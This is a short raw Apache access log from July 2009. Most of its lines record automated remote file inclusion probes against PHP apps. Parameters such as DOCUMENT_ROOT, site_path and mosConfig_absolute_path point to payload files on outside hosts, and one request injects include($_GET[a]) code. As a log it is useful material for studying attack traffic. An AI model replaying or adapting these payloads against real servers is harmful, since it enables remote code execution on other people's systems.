211.230.156.161 - - [06/Jul/2009:02:53:42 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:53:48 -0400] "GET /logs/access_log.Q109051700%20%20//include/admin.lib.inc.php?site_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:53:56 -0400] "GET //index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:53:56 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:53:56 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:54:10 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:55:11 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:55:15 -0400] "GET //?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:55:15 -0400] "GET /logs//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:56:03 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:02:56:09 -0400] "GET /logs/error_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:57:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.238.52.141 - - [06/Jul/2009:03:01:03 -0400] "GET /?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:01:03 -0400] "GET /logs/access_log.Q109050800/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
213.238.52.141 - - [06/Jul/2009:03:01:03 -0400] "GET /logs/?DOCUMENT_ROOT=http://jiao-hua.org//idade1.txt??? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
